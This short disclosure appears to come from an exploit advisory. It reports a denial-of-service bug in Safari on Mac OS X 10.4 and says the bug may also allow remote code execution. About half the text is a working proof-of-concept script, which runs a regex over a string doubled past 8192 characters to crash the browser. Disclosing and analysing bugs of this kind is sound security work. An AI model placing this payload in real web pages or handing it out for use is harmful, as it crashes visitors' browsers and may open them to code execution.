The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution. <script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>